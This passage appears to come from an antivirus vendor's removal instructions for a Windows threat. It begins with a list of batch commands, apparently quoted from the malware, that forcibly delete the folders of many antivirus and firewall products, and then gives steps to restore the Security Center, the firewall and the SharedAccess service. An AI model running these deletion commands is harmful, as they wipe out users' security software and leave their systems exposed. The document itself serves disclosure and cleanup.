@deltree/y c:\progra~1\common~1\symant~1\*.* >nul
@deltree/y c:\progra~1\datafe~1\*.* >nul
@deltree/y c:\progra~1\deerfi~1.com\*.* >nul
@deltree/y c:\progra~1\f-prot\*.* >nul
@deltree/y c:\progra~1\f-prot95\*.* >nul
@deltree/y c:\progra~1\findvi~1\*.* >nul
@deltree/y c:\progra~1\f-secu~1\*.* >nul
@deltree/y c:\progra~1\f-secure\*.* >nul
@deltree/y c:\progra~1\fsi\*.* >nul
@deltree/y c:\progra~1\fwin\*.* >nul
@deltree/y c:\progra~1\fwin32\*.* >nul
@deltree/y c:\progra~1\grisoft\*.* >nul
@deltree/y c:\progra~1\inocul~1\*.* >nul
@deltree/y c:\progra~1\inocul~2\*.* >nul
@deltree/y c:\progra~1\intern~2\*.* >nul
@deltree/y c:\progra~1\kasper~1\*.* >nul
@deltree/y c:\progra~1\kasper~2\*.* >nul
@deltree/y c:\progra~1\mcafee\*.* >nul
@deltree/y c:\progra~1\mcafee~1\*.* >nul
@deltree/y c:\progra~1\mindso~1\*.* >nul
@deltree/y c:\progra~1\norman\*.* >nul
@deltree/y c:\progra~1\norton~1\*.* >nul
@deltree/y c:\progra~1\norton~2\*.* >nul
@deltree/y c:\progra~1\pandas~1\*.* >nul
@deltree/y c:\progra~1\protec~1\*.* >nul
@deltree/y c:\progra~1\protec~2\*.* >nul
@deltree/y c:\progra~1\quickh~1\*.* >nul
@deltree/y c:\progra~1\rav\*.* >nul
@deltree/y c:\progra~1\signal9\*.* >nul
@deltree/y c:\progra~1\softwin\*.* >nul
@deltree/y c:\progra~1\spysto~1\*.* >nul
@deltree/y c:\progra~1\symant~1\*.* >nul
@deltree/y c:\progra~1\tbav\*.* >nul
@deltree/y c:\progra~1\tinype~1\*.* >nul
@deltree/y c:\progra~1\trendm~1\*.* >nul
@deltree/y c:\progra~1\trendp~1\*.* >nul
@deltree/y c:\progra~1\trojan~1\*.* >nul
@deltree/y c:\progra~1\trojan~2\*.* >nul
@deltree/y c:\progra~1\virusm~1.0\*.* >nul
@deltree/y c:\progra~1\zonela~1\*.* >nul
@deltree/y c:\progra~1\zonela~2\*.* >nul


Click File, and then click Save.

Click File, and then click Exit.

7. To restore the Windows Security Center
This threat attempts to disable the features in the Windows Security Center, available in Windows XP Service Pack 2. If you are running Windows XP Service Pack 2 and would like to restore the full functionality of the Windows Security Center, please complete the following steps:

Important: If your computer is connected to a domain, you may not be able to adjust these settings. If so, contact your network administrator for more information.

Click Start > Control Panel.
Double-click the Security Center.
In the right pane, click Windows Firewall. The Windows Firewall dialog appears.
Select On.
Click OK to close the Windows Firewall.
In the left pane of the Security Center, select Change the way Security Center alerts me.
Click Alert Settings.
Select Alert Settings, Firewall, and Virus Protection.
Click OK.
Click Automatic Updates.
Select Automatic.
Click OK.
Exit the Security Center.

8. To reenable the SharedAccess service (Windows 2000/XP only)
The SharedAccess service is responsible for maintaining Internet Connection Sharing and the Windows Firewall/Internet Connection Firewall applications in Windows. (The presence and names of these applications vary depending on the operating system and service pack you are using.) To protect your computer and maintain network functionality, re-enable this service if you are using any of these programs.


Windows XP Service Pack 2
If you are running Windows XP with Service Pack 2 and are using the Windows Firewall, the operating system will alert you when the SharedAccess service is stopped, by displaying an alert balloon saying that your Firewall status is unknown. Perform the following steps to ensure that the Windows Firewall is re-enabled:

Click Start > Control Panel.


Double-click the Security Center.


Ensure that the Firewall security essential is marked ON.

Note: If the Firewall security essential is marked on, your Windows Firewall is on and you do not need to continue with these steps.

If the Firewall security essential is not marked on, click the "Recommendations" button.


Under "Recommendations," click Enable Now. A window appears telling you that the Windows Firewall was successfully turned on.


Click Close, and then click OK.


Close the Security Center.


Windows 2000 or Windows XP Service Pack 1 or earlier
Complete the following steps to re-enable the SharedAccess service:

Click Start > Run.
Type services.msc

Then click OK.


Do one of the following:

Windows 2000: Under the Name column, locate the "Internet Connection Sharing (ICS)" service and double-click it.
Windows XP: Under the Name column, locate the "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" service and double-click it.


Under "Startup Type:", select "Automatic" from the drop-down menu.


Under "Service Status:", click the Start button.

Once the service has completed starting, click OK.

Close the Services window.